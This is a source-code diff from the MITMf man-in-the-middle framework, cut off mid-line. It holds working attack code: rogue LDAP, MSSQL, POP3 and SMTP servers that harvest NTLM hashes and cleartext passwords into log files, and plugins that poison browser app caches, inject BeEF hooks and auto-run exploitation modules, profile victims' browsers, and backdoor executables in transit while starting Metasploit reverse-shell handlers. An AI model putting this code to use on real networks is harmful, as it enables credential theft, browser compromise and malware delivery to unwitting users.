b/core/responder/ldap/LDAPServer.py similarity index 72% rename from core/protocols/ldap/LDAPServer.py rename to core/responder/ldap/LDAPServer.py index fa65472..4629f71 100644 --- a/core/protocols/ldap/LDAPServer.py +++ b/core/responder/ldap/LDAPServer.py @@ -1,25 +1,27 @@ -################################################################################## -#LDAP Stuff starts here -################################################################################## +import struct +import logging +import threading +import re + +from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from LDAPPackets import * +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") class LDAPServer(): - def serve_thread_tcp(self, host, port, handler): - try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + def start(self, chal): + global Challenge; Challenge = chal - #Function name self-explanatory - def start(self, LDAP_On_Off): - if LDAP_On_Off == "ON": - t = threading.Thread(name="LDAP", target=self.serve_thread_tcp, args=("0.0.0.0", 389,LDAP)) + try: + mitmf_logger.debug("[LDAPServer] online") + server = ThreadingTCPServer(("0.0.0.0", 389), LDAP) + t = threading.Thread(name="LDAPServer", target=server.serve_forever) t.setDaemon(True) t.start() - - if LDAP_On_Off == "OFF": - return False + except Exception, e: + mitmf_logger.error("[LDAPServer] Error starting on port {}: {}".format(389, e)) class ThreadingTCPServer(ThreadingMixIn, TCPServer): @@ -54,15 +56,15 @@ def ParseLDAPHash(data,client): UserLen = struct.unpack('. 
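Each of these hunks removes the same copy-pasted Packet class and imports it from a single core.responder.packet module instead. A sketch of that shared base class as it appears in the removed lines; the FTPPacket field layout here is only illustrative, and collections.OrderedDict stands in for the bundled odict module:

```python
from collections import OrderedDict

class Packet(object):
    """Ordered set of string fields that serializes by plain concatenation."""
    fields = OrderedDict([
        ("data", ""),
    ])

    def __init__(self, **kw):
        # copy the class-level template so instances can be customised safely
        self.fields = OrderedDict(self.__class__.fields)
        for k, v in kw.items():
            if callable(v):
                # a callable receives the default value and returns the new one
                self.fields[k] = v(self.fields[k])
            else:
                self.fields[k] = v

    def __str__(self):
        return "".join(map(str, self.fields.values()))

class FTPPacket(Packet):
    fields = OrderedDict([
        ("Code", "220"),
        ("Separator", " "),
        ("Message", "Welcome"),
        ("CRLF", "\r\n"),
    ])

# str(FTPPacket(Code="331", Message="User name okay, need password."))
# -> '331 User name okay, need password.\r\n'
```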
import struct -from odict import OrderedDict - -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, self.fields.values())) +from core.responder.odict import OrderedDict +from core.responder.packet import Packet #MS-SQL Pre-login packet class class MSSQLPreLoginAnswer(Packet): diff --git a/core/responder/mssql/MSSQLServer.py b/core/responder/mssql/MSSQLServer.py new file mode 100644 index 0000000..71d38a5 --- /dev/null +++ b/core/responder/mssql/MSSQLServer.py @@ -0,0 +1,127 @@ +import struct +import logging +import threading + +from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from MSSQLPackets import * +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") + +class MSSQLServer(): + + def start(self, chal): + global Challenge; Challenge = chal + + try: + mitmf_logger.debug("[MSSQLServer] online") + server = ThreadingTCPServer(("0.0.0.0", 1433), MSSQL) + t = threading.Thread(name="MSSQLServer", target=server.serve_forever) + t.setDaemon(True) + t.start() + except Exception, e: + mitmf_logger.error("[MSSQLServer] Error starting on port {}: {}".format(1433, e)) + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = True + + def server_bind(self): + TCPServer.server_bind(self) + +#This function parse SQL NTLMv1/v2 hash and dump it into a specific file. +def ParseSQLHash(data,client): + SSPIStart = data[8:] + LMhashLen = struct.unpack(' 60: + DomainLen = struct.unpack('H',Data[2:4])[0] + EncryptionValue = Data[PacketLen-7:PacketLen-6] + if re.search("NTLMSSP",Data): + return True + else: + return False + +#MS-SQL server class. 
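MSSQLServer.start() above uses the same plumbing as the FTP, IMAP, POP3, SMTP and LDAP servers: a SocketServer ThreadingTCPServer handed a BaseRequestHandler subclass and left running in a daemon thread next to the proxy. Stripped down to that pattern, with a hypothetical EchoHandler in place of a real protocol handler such as the MSSQL class that follows:

```python
import logging
import threading
from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler

mitmf_logger = logging.getLogger("mitmf")

class ThreadingTCPServer(ThreadingMixIn, TCPServer):
    allow_reuse_address = True

class EchoHandler(BaseRequestHandler):
    """Toy handler: log whatever the client sends, then let the connection drop."""
    def handle(self):
        data = self.request.recv(1024)
        mitmf_logger.info("[EchoServer] {} sent: {!r}".format(self.client_address[0], data))

class EchoServer(object):
    def start(self, port=2121):
        try:
            mitmf_logger.debug("[EchoServer] online")
            server = ThreadingTCPServer(("0.0.0.0", port), EchoHandler)
            t = threading.Thread(name="EchoServer", target=server.serve_forever)
            t.setDaemon(True)  # dies with the main process, like the servers above
            t.start()
        except Exception as e:
            mitmf_logger.error("[EchoServer] Error starting on port {}: {}".format(port, e))
```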
+class MSSQL(BaseRequestHandler): + + def handle(self): + try: + while True: + data = self.request.recv(1024) + self.request.settimeout(0.1) + ##Pre-Login Message + if data[0] == "\x12": + buffer0 = str(MSSQLPreLoginAnswer()) + self.request.send(buffer0) + data = self.request.recv(1024) + ##NegoSSP + if data[0] == "\x10": + if re.search("NTLMSSP",data): + t = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge) + t.calculate() + buffer1 = str(t) + self.request.send(buffer1) + data = self.request.recv(1024) + else: + ParseClearTextSQLPass(data,self.client_address[0]) + ##NegoSSP Auth + if data[0] == "\x11": + ParseSQLHash(data,self.client_address[0]) + except Exception: + pass + self.request.close() diff --git a/core/protocols/mssql/__init__.py b/core/responder/mssql/__init__.py similarity index 100% rename from core/protocols/mssql/__init__.py rename to core/responder/mssql/__init__.py diff --git a/core/responder/pop3/POP3Server.py b/core/responder/pop3/POP3Server.py new file mode 100644 index 0000000..860ab91 --- /dev/null +++ b/core/responder/pop3/POP3Server.py @@ -0,0 +1,63 @@ +import logging +import threading + +from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from core.responder.common import * +from core.responder.odict import OrderedDict +from core.responder.packet import Packet + +mitmf_logger = logging.getLogger("mitmf") + +class POP3Server(): + + def start(self): + try: + mitmf_logger.debug("[POP3Server] online") + server = ThreadingTCPServer(("0.0.0.0", 110), POP) + t = threading.Thread(name="POP3Server", target=server.serve_forever) + t.setDaemon(True) + t.start() + except Exception, e: + mitmf_logger.error("[POP3Server] Error starting on port {}: {}".format(110, e)) + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + + +class POPOKPacket(Packet): + fields = OrderedDict([ + ("Code", "+OK"), + ("CRLF", "\r\n"), + ]) + +#POP3 server class. +class POP(BaseRequestHandler): + + def handle(self): + try: + self.request.send(str(POPOKPacket())) + data = self.request.recv(1024) + if data[0:4] == "USER": + User = data[5:].replace("\r\n","") + mitmf_logger.info('[+]POP3 User: %s'%(User)) + t = POPOKPacket() + self.request.send(str(t)) + data = self.request.recv(1024) + if data[0:4] == "PASS": + Pass = data[5:].replace("\r\n","") + Outfile = "./logs/responder/POP3-Clear-Text-Password-"+self.client_address[0]+".txt" + WriteData(Outfile,User+":"+Pass, User+":"+Pass) + mitmf_logger.info("[POP3Server] POP3 Credentials from {}. User/Pass: {}:{} ".format(self.client_address[0],User,Pass)) + t = POPOKPacket() + self.request.send(str(t)) + data = self.request.recv(1024) + else : + t = POPOKPacket() + self.request.send(str(t)) + data = self.request.recv(1024) + except Exception as e: + mitmf_logger.error("[POP3Server] Error handling request: {}".format(e)) \ No newline at end of file diff --git a/core/protocols/pop3/__init__.py b/core/responder/pop3/__init__.py similarity index 100% rename from core/protocols/pop3/__init__.py rename to core/responder/pop3/__init__.py diff --git a/core/protocols/smtp/SMTPPackets.py b/core/responder/smtp/SMTPPackets.py similarity index 81% rename from core/protocols/smtp/SMTPPackets.py rename to core/responder/smtp/SMTPPackets.py index 65e252c..0f80519 100644 --- a/core/protocols/smtp/SMTPPackets.py +++ b/core/responder/smtp/SMTPPackets.py @@ -16,21 +16,8 @@ # You should have received a copy of the GNU General Public License # along with this program. 
If not, see . import struct -from odict import OrderedDict - -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, self.fields.values())) +from core.responder.odict import OrderedDict +from core.responder.packet import Packet #SMTP Greating class class SMTPGreating(Packet): diff --git a/core/responder/smtp/SMTPServer.py b/core/responder/smtp/SMTPServer.py new file mode 100644 index 0000000..f07df49 --- /dev/null +++ b/core/responder/smtp/SMTPServer.py @@ -0,0 +1,62 @@ +import logging +import threading + +from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from base64 import b64decode +from SMTPPackets import * +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") + +class SMTPServer(): + + def serve_thread_tcp(self, port): + try: + server = ThreadingTCPServer(("0.0.0.0", port), ESMTP) + server.serve_forever() + except Exception as e: + mitmf_logger.error("[SMTPServer] Error starting TCP server on port {}: {}".format(port, e)) + + #Function name self-explanatory + def start(self): + mitmf_logger.debug("[SMTPServer] online") + t1 = threading.Thread(name="ESMTP-25", target=self.serve_thread_tcp, args=(25,)) + t2 = threading.Thread(name="ESMTP-587", target=self.serve_thread_tcp, args=(587,)) + + for t in [t1, t2]: + t.setDaemon(True) + t.start() + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + +#ESMTP server class. +class ESMTP(BaseRequestHandler): + + def handle(self): + try: + self.request.send(str(SMTPGreating())) + data = self.request.recv(1024) + if data[0:4] == "EHLO": + self.request.send(str(SMTPAUTH())) + data = self.request.recv(1024) + if data[0:4] == "AUTH": + self.request.send(str(SMTPAUTH1())) + data = self.request.recv(1024) + if data: + Username = b64decode(data[:len(data)-2]) + self.request.send(str(SMTPAUTH2())) + data = self.request.recv(1024) + if data: + Password = b64decode(data[:len(data)-2]) + Outfile = "./logs/responder/SMTP-Clear-Text-Password-"+self.client_address[0]+".txt" + WriteData(Outfile,Username+":"+Password, Username+":"+Password) + #print "[+]SMTP Credentials from %s. 
User/Pass: %s:%s "%(self.client_address[0],Username,Password) + mitmf_logger.info("[SMTPServer] {} SMTP User: {} Pass:{} ".format(self.client_address[0],Username,Password)) + + except Exception as e: + mitmf_logger.error("[SMTPServer] Error handling request: {}".format(e)) diff --git a/core/protocols/smtp/__init__.py b/core/responder/smtp/__init__.py similarity index 100% rename from core/protocols/smtp/__init__.py rename to core/responder/smtp/__init__.py diff --git a/core/sergioproxy/ProxyPlugins.py b/core/sergioproxy/ProxyPlugins.py index a182326..9fe76cb 100644 --- a/core/sergioproxy/ProxyPlugins.py +++ b/core/sergioproxy/ProxyPlugins.py @@ -103,7 +103,7 @@ class ProxyPlugins: except KeyError as e: pass except Exception as e: - #This is needed because errors in hooked functions won't raise an Exception + Tracback (which can be infuriating) + #This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating) mitmf_logger.error("[ProxyPlugins] Exception occurred in hooked function") traceback.print_exc() diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 3aadfc5..4f3cb11 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -98,7 +98,7 @@ class ServerConnection(HTTPClient): postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging if len(postdata) > 0: mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], postdata)) - except UnicodeDecodeError: + except UnicodeDecodeError and UnicodeEncodeError: mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host'])) pass diff --git a/libs/bdfactory b/libs/bdfactory index 4609ade..0bd3429 160000 --- a/libs/bdfactory +++ b/libs/bdfactory @@ -1 +1 @@ -Subproject commit 4609adeb5383135352aa27113d8ee1398aecff99 +Subproject commit 0bd3429e6775395c3522046ab21193a36ab2e0fe diff --git a/mitmf.py b/mitmf.py index 349b76b..5263505 100755 --- a/mitmf.py +++ b/mitmf.py @@ -39,8 +39,6 @@ if os.geteuid() != 0: mitmf_version = "0.9.7" sslstrip_version = "0.9" sergio_version = "0.2.1" -dnschef_version = "0.4" -netcreds_version = "1.0" parser = argparse.ArgumentParser(description="MITMf v{} - Framework for MITM attacks".format(mitmf_version), version=mitmf_version, usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@') @@ -162,17 +160,16 @@ print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version) #Start Net-Creds from core.netcreds.NetCreds import NetCreds NetCreds().start(args.interface, myip) -print "|_ Net-Creds v{} online".format(netcreds_version) +print "|_ Net-Creds v{} online".format(NetCreds.version) #Start DNSChef from core.dnschef.DNSchef import DNSChef DNSChef.getInstance().start() -print "|_ DNSChef v{} online".format(dnschef_version) +print "|_ DNSChef v{} online".format(DNSChef.version) #start the SMB server from core.protocols.smb.SMBserver import SMBserver -from impacket import version -print "|_ SMBserver online (Impacket {})\n".format(version.VER_MINOR) +print "|_ SMBserver online (Impacket {})\n".format(SMBserver.impacket_ver) SMBserver().start() #start the reactor diff --git a/plugins/AppCachePoison.py b/plugins/AppCachePoison.py new file mode 100644 index 0000000..4b787b9 --- /dev/null +++ b/plugins/AppCachePoison.py @@ -0,0 +1,206 @@ +#!/usr/bin/env 
python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz + +import logging +import re +import os.path +import time +import sys + +from datetime import date +from plugins.plugin import Plugin +from core.sslstrip.URLMonitor import URLMonitor + +mitmf_logger = logging.getLogger("mitmf") + +class AppCachePlugin(Plugin): + name = "App Cache Poison" + optname = "appoison" + desc = "Performs App Cache Poisoning attacks" + implements = ["handleResponse"] + version = "0.3" + has_opts = False + + def initialize(self, options): + self.options = options + self.mass_poisoned_browsers = [] + self.urlMonitor = URLMonitor.getInstance() + + self.urlMonitor.setAppCachePoisoning() + + def handleResponse(self, request, data): + + self.app_config = self.config['AppCachePoison'] # so we reload the config on each request + url = request.client.uri + req_headers = request.client.getAllHeaders() + headers = request.client.responseHeaders + ip = request.client.getClientIP() + + ######################################################################### + + if "enable_only_in_useragents" in self.app_config: + regexp = self.app_config["enable_only_in_useragents"] + if regexp and not re.search(regexp,req_headers["user-agent"]): + mitmf_logger.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"])) + return {'request': request, 'data': data} + + urls = self.urlMonitor.getRedirectionSet(url) + mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls)) + (name,s,element,url) = self.getSectionForUrls(urls) + + if s is False: + data = self.tryMassPoison(url, data, headers, req_headers, ip) + return {'request': request, 'data': data} + + mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name)) + p = self.getTemplatePrefix(s) + + if element == 'tamper': + mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p)) + if os.path.exists(p + '.replace'): # replace whole content + f = open(p + '.replace','r') + data = self.decorate(f.read(), s) + f.close() + + elif os.path.exists(p + '.append'): # append file to body + f = open(p + '.append','r') + appendix = self.decorate(f.read(), s) + f.close() + # append to body + data = re.sub(re.compile("",re.IGNORECASE),appendix + "", data) + + # add manifest reference + data = re.sub(re.compile("",re.IGNORECASE),appendix + "", data) + self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip + return data + + def getMassPoisonHtml(self): + html = "
" + for i in self.app_config: + if isinstance(self.app_config[i], dict): + if self.app_config[i].has_key('tamper_url') and not self.app_config[i].get('skip_in_mass_poison', False): + html += "" + + return html + "
" + + def cacheForFuture(self, headers): + ten_years = 315569260 + headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)]) + headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh + in_ten_years = date.fromtimestamp(time.time() + ten_years) + headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")]) + + def removeDangerousHeaders(self, headers): + headers.removeHeader("X-Frame-Options") + + def getSpoofedManifest(self, url, section): + p = self.getTemplatePrefix(section) + if not os.path.exists(p+'.manifest'): + p = self.getDefaultTemplatePrefix() + + f = open(p + '.manifest', 'r') + manifest = f.read() + f.close() + return self.decorate(manifest, section) + + def decorate(self, content, section): + for i in section: + content = content.replace("%%"+i+"%%", section[i]) + return content + + def getTemplatePrefix(self, section): + if section.has_key('templates'): + return self.app_config['templates_path'] + '/' + section['templates'] + + return self.getDefaultTemplatePrefix() + + def getDefaultTemplatePrefix(self): + return self.app_config['templates_path'] + '/default' + + def getManifestUrl(self, section): + return section.get("manifest_url",'/robots.txt') + + def getSectionForUrls(self, urls): + for url in urls: + for i in self.app_config: + if isinstance(self.app_config[i], dict): #section + section = self.app_config[i] + name = i + + if section.get('tamper_url',False) == url: + return (name, section, 'tamper',url) + + if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url): + return (name, section, 'tamper',url) + + if section.get('manifest_url',False) == url: + return (name, section, 'manifest',url) + + if section.get('raw_url',False) == url: + return (name, section, 'raw',url) + + return (None, False,'',urls.copy().pop()) + + diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py new file mode 100644 index 0000000..e2ade2e --- /dev/null +++ b/plugins/BeefAutorun.py @@ -0,0 +1,127 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. 
+# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging +import sys +import json + +from time import sleep +from core.beefapi import BeefAPI +from core.utils import SystemConfig +from plugins.plugin import Plugin +from plugins.Inject import Inject + +mitmf_logger = logging.getLogger("mitmf") + +class BeefAutorun(Inject, Plugin): + name = "BeEFAutorun" + optname = "beefauto" + desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type" + tree_output = [] + depends = ["Inject"] + version = "0.3" + has_opts = False + + def initialize(self, options): + self.options = options + self.ip_address = SystemConfig.getIP(options.interface) + + Inject.initialize(self, options) + + self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode'])) + self.onConfigChange() + + def onConfigChange(self): + + beefconfig = self.config['MITMf']['BeEF'] + + self.html_payload = ''.format(self.ip_address, beefconfig['beefport']) + + self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']}) + if not self.beef.login(beefconfig['user'], beefconfig['pass']): + sys.exit("[-] Error logging in to BeEF!") + + def startThread(self, options): + self.autorun() + + def autorun(self): + already_ran = [] + already_hooked = [] + + while True: + mode = self.config['BeEFAutorun']['mode'] + sessions = self.beef.sessions_online() + if (sessions is not None and len(sessions) > 0): + for session in sessions: + + if session not in already_hooked: + info = self.beef.hook_info(session) + mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os'])) + already_hooked.append(session) + self.black_ips.append(str(info['ip'])) + + if mode == 'oneshot': + if session not in already_ran: + self.execModules(session) + already_ran.append(session) + + elif mode == 'loop': + self.execModules(session) + sleep(10) + + else: + sleep(1) + + def execModules(self, session): + session_info = self.beef.hook_info(session) + session_ip = session_info['ip'] + hook_browser = session_info['name'] + hook_os = session_info['os'] + all_modules = self.config['BeEFAutorun']["ALL"] + targeted_modules = self.config['BeEFAutorun']["targets"] + + if len(all_modules) > 0: + mitmf_logger.info("{} >> sending generic modules".format(session_ip)) + for module, options in all_modules.iteritems(): + mod_id = self.beef.module_id(module) + resp = self.beef.module_run(session, mod_id, json.loads(options)) + if resp["success"] == 'true': + mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) + else: + mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) + sleep(0.5) + + mitmf_logger.info("{} >> sending targeted modules".format(session_ip)) + for os in targeted_modules: + if (os in hook_os) or (os == hook_os): + browsers = targeted_modules[os] + if len(browsers) > 0: + for browser in browsers: + if browser == hook_browser: + modules = targeted_modules[os][browser] + if len(modules) > 0: + for module, options in modules.iteritems(): + mod_id = self.beef.module_id(module) + resp = self.beef.module_run(session, mod_id, json.loads(options)) + if resp["success"] == 'true': + mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) + else: + mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) + 
sleep(0.5) diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py new file mode 100644 index 0000000..1b48b6a --- /dev/null +++ b/plugins/BrowserProfiler.py @@ -0,0 +1,129 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# +import logging + +from pprint import pformat +from plugins.plugin import Plugin +from plugins.Inject import Inject + +mitmf_logger = logging.getLogger("mitmf") + +class BrowserProfiler(Inject, Plugin): + name = "Browser Profiler" + optname = "browserprofiler" + desc = "Attempts to enumerate all browser plugins of connected clients" + implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] + depends = ["Inject"] + version = "0.2" + has_opts = False + + def initialize(self, options): + Inject.initialize(self, options) + self.html_payload = self.get_payload() + self.dic_output = {} # so other plugins can access the results + + def post2dict(self, post): #converts the ajax post to a dic + dict = {} + for line in post.split('&'): + t = line.split('=') + dict[t[0]] = t[1] + return dict + + def sendPostData(self, request): + #Handle the plugin output + if 'clientprfl' in request.uri: + self.dic_output = self.post2dict(request.postData) + self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client + if self.dic_output['plugin_list'] > 0: + self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',') + pretty_output = pformat(self.dic_output) + mitmf_logger.info("{} >> Browser Profiler data:\n{}".format(request.client.getClientIP(), pretty_output)) + + def get_payload(self): + payload = """""" + + return payload diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py new file mode 100644 index 0000000..54bf08a --- /dev/null +++ b/plugins/FilePwn.py @@ -0,0 +1,650 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something' +# +# Author Joshua Pitts the.midnite.runr 'at' gmail com +# +# Copyright (c) 2013-2014, Joshua Pitts +# All rights reserved. 
+# +# Redistribution and use in source and binary forms, with or without modification, +# are permitted provided that the following conditions are met: +# +# 1. Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# +# 2. Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# +# 3. Neither the name of the copyright holder nor the names of its contributors +# may be used to endorse or promote products derived from this software without +# specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +# POSSIBILITY OF SUCH DAMAGE. +# +# Tested on Kali-Linux. + +import sys +import os +import pefile +import zipfile +import logging +import shutil +import random +import string +import tarfile +import multiprocessing + +from libs.bdfactory import pebin +from libs.bdfactory import elfbin +from libs.bdfactory import machobin +from core.msfrpc import Msfrpc +from plugins.plugin import Plugin +from tempfile import mkstemp +from configobj import ConfigObj + +mitmf_logger = logging.getLogger("mitmf") + +class FilePwn(Plugin): + name = "FilePwn" + optname = "filepwn" + desc = "Backdoor executables being sent over http using bdfactory" + implements = ["handleResponse"] + tree_output = ["BDFProxy v0.3.2 online"] + version = "0.3" + has_opts = False + + def initialize(self, options): + '''Called if plugin is enabled, passed the options namespace''' + self.options = options + + self.patched = multiprocessing.Queue() + + #FOR FUTURE USE + self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream'] + + #FOR FUTURE USE + self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip'] + + #USED NOW + self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0}, + 'pe': {'number': 'MZ', 'offset': 0}, + 'gz': {'number': '1f8b'.decode('hex'), 'offset': 0}, + 'bz': {'number': 'BZ', 'offset': 0}, + 'zip': {'number': '504b0304'.decode('hex'), 'offset': 0}, + 'tar': {'number': 'ustar', 'offset': 257}, + 'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0}, + 'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0}, + 'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0}, + } + + #NOT USED NOW + #self.supportedBins = ('MZ', '7f454c46'.decode('hex')) + + #FilePwn options + self.userConfig = self.config['FilePwn'] + self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] + self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] + self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64'] + self.WindowsType 
= self.userConfig['targets']['ALL']['WindowsType'] + self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86'] + self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64'] + self.LinuxType = self.userConfig['targets']['ALL']['LinuxType'] + self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86'] + self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64'] + self.FatPriority = self.userConfig['targets']['ALL']['FatPriority'] + self.zipblacklist = self.userConfig['ZIP']['blacklist'] + self.tarblacklist = self.userConfig['TAR']['blacklist'] + + #Metasploit options + msfcfg = self.config['MITMf']['Metasploit'] + rpcip = msfcfg['rpcip'] + rpcpass = msfcfg['rpcpass'] + + try: + msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary + msf.login('msf', rpcpass) + version = msf.call('core.version')['version'] + self.tree_output.append("Connected to Metasploit v{}".format(version)) + except Exception: + sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") + + self.tree_output.append("Setting up Metasploit payload handlers") + jobs = msf.call('job.list') + for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]: + cmd = "use exploit/multi/handler\n" + cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) + cmd += "set LHOST {}\n".format(config["HOST"]) + cmd += "set LPORT {}\n".format(config["PORT"]) + cmd += "exploit -j\n" + + if jobs: + for pid, name in jobs.iteritems(): + info = msf.call('job.info', [pid]) + if (info['name'] != "Exploit: multi/handler") or 